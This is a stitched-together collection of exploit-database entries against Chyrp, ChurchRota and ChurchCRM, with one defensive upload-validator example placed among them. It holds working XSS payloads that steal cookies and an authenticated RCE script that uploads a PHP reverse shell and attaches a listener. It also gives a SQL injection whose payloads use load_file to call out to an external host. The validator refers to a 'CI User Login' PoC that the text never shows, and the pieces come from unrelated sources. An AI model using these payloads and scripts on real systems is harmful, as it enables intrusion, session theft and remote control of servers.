Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------28307567523233313132815561598
Content-Length: 1194
Origin: http://localhost
Referer: http://localhost/chyrp/admin/?action=write_post
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="title"
"><img src=x onerror=alert("Stored")>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="body"
<p>1337</p>
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="status"
public
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="slug"
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="created_at"
04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="original_time"
04/24/24 12:31:57
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="trackbacks"
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="feather"
text
-----------------------------28307567523233313132815561598
Content-Disposition: form-data; name="hash"
11e11aba15114f918ec1c2e6b8f8ddcf
-----------------------------28307567523233313132815561598--
source: https://www.securityfocus.com/bid/52117/info
Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Chyrp 2.1.2 is vulnerable; other versions may also be affected.
<form action="http://[host]/includes/error.php" method="post">
<input type="hidden" name="ajax" value="1" />
<input type="hidden" name="body" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
source: https://www.securityfocus.com/bid/52115/info
Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Chyrp 2.1.1 is vulnerable; other versions may also be affected.
<form action="http://[host]/includes/ajax.php" method="post">
<input type="hidden" name="action" value="preview" />
<input type="hidden" name="feather" value="" />
<input type="hidden" name="field" value="" />
<input type="hidden" name="content" value='<script>alert(document.cookie);</script>' />
<input type="submit" id="btn">
</form>
# Exploit Title: ChurchRota 2.6.4 - RCE (Authenticated)
# Date: 1/19/2021
# Exploit Author: Rob McCarthy (@slixperi)
# Vendor Homepage: https://github.com/Little-Ben/ChurchRota
# Software Link: https://github.com/Little-Ben/ChurchRota
# Version: 2.6.4
# Tested on: Ubuntu
import requests
from pwn import listen
############################################################################################################
# Description #
# Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. #
# The user does not need to have file upload permission in order to upload and execute an arbitrary file. #
# The application is written primarily with PHP so we use PHP in our PoC #
############################################################################################################
# credentials of the low privilege user
USERNAME='slixperi'
PASSWORD='slixperi'
LISTENER_IP = '127.0.0.1'
LISTENER_PORT = '4444'
TARGET_IP = '127.0.0.1'
TARGET_PORT = '8081'
# set the credentials for login POST
credentials = {"username":USERNAME,"password":PASSWORD}
# create a session to preserve session state
sesh = requests.session()
# login as our low-privilege user (normally only admins can upload files)
sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/login.php", data=credentials)
# define the payload
payload = f"<?php $sock=fsockopen(\"{LISTENER_IP}\",{LISTENER_PORT});$proc=proc_open(\"/bin/sh -i\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>"
# file upload
sesh.headers.update({"Referer": f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=new"})
files = {'resourcefile': ("shell.php", payload)}
sesh.post(f"http://{TARGET_IP}:{TARGET_PORT}/resources.php?action=newsent", files=files)
l = listen(LISTENER_PORT)
# execute the file
sesh.get(f"http://{TARGET_IP}:{TARGET_PORT}/documents/shell.php")
l.interactive()
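An added example (not ChurchRota's, CI User Login's or Chyrp's code) of the server-side upload check that all three upload bugs on this page lack: the CI User Login PoC stores phpinfo.php under assets/images, ChurchRota stores shell.php under documents, and Chyrp's only filter is the client-side SWFUpload file_types list. The validator ignores the client's Content-Type and original filename, requires exactly one allow-listed extension, checks the magic bytes, and stores the file under a random name. The sample filenames and bodies are constructed from the PoCs above; the allow-list, the function names and the policy choices are this example's own assumptions.

```python
import os
import secrets

# Magic numbers for the image types this policy is willing to store.
ALLOWED_TYPES = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, content_type: str, data: bytes) -> str:
    """Return a random server-side filename for an image upload, or raise.

    content_type is accepted only to make the point that it is ignored: the
    client sets it, exactly as it sets the filename. The checks that matter
    are on the shape of the name and on the bytes themselves."""
    del content_type  # attacker-controlled, never consulted
    name = os.path.basename(filename.replace("\\", "/"))
    if name != filename or name in ("", ".", ".."):
        raise UploadRejected("path components in filename")
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("need exactly one extension")  # no x.php.jpg for mod_mime
    ext = parts[1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match declared type")
    if b"<?php" in data or b"<?=" in data:
        raise UploadRejected("embedded PHP tag")  # polyglot image + lax handler config
    return f"{secrets.token_hex(16)}.{ext}"


def try_upload(filename: str, content_type: str, data: bytes) -> tuple:
    """Wrapper: ('accepted', stored_name) or ('rejected', reason)."""
    try:
        return ("accepted", validate_upload(filename, content_type, data))
    except UploadRejected as e:
        return ("rejected", str(e))


# Constructed samples echoing the PoCs above.
JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 16           # minimal JPEG start
PHPINFO = b"<?php\nphpinfo();\n?>"                           # CI User Login PoC body
REVSHELL = b"<?php $sock=fsockopen('127.0.0.1',4444); ?>"   # ChurchRota-style body

SAMPLES = [
    ("phpinfo.php",    "application/force-download", PHPINFO),
    ("shell.php",      "image/jpeg",                 REVSHELL),
    ("avatar.jpg",     "image/jpeg",                 PHPINFO),
    ("avatar.php.jpg", "image/jpeg",                 JPEG_HEADER),
    ("../avatar.jpg",  "image/jpeg",                 JPEG_HEADER),
    ("avatar.jpg",     "image/jpeg",                 JPEG_HEADER + REVSHELL),
    ("avatar.jpg",     "text/plain",                 JPEG_HEADER),
]

if __name__ == "__main__":
    for fn, ct, body in SAMPLES:
        print(f"{fn:16} {ct:28} -> {try_upload(fn, ct, body)}")
```

Storing under a random name is what removes the attacker's control over the URL; serving the upload directory with script execution disabled is the second half, and is a web-server setting rather than something this function can enforce.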
# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
# Date: 2023-04-17
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: http://churchcrm.io/
# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4
# Version: 4.5.4
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31699
Steps to Reproduce:
1. First, log in to the admin panel.
2. Open the "Admin" menu and click "CSV Import"; the CSV file uploader is shown.
3. Insert the XSS payload into a JPG file's metadata (with exiftool, or via the
image properties dialog) and upload the JPG file.
4. The XSS pop-up appears.
## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
## Author: nu11secur1ty
## Date: 02.27.2023
## Vendor: http://churchcrm.io/
## Software: https://github.com/ChurchCRM/CRM
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
In manual insertion point 1, the `EID` GET parameter is vulnerable to SQL
injection. No cookies and no admin authentication are needed, so an attacker
can easily extract information from the system through this vulnerability.
STATUS: HIGH Vulnerability - CRITICAL
[+]Payload:
```mysql
---
Parameter: EID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
OR NOT 2407=2407
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
Type: UNION query
Title: MySQL UNION query (UTF8) - 11 columns
Payload: EID=(select
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior'))
UNION ALL SELECT
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1)
## Proof and Exploit:
[href](https://streamable.com/1eqhw2)
## Time spent:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>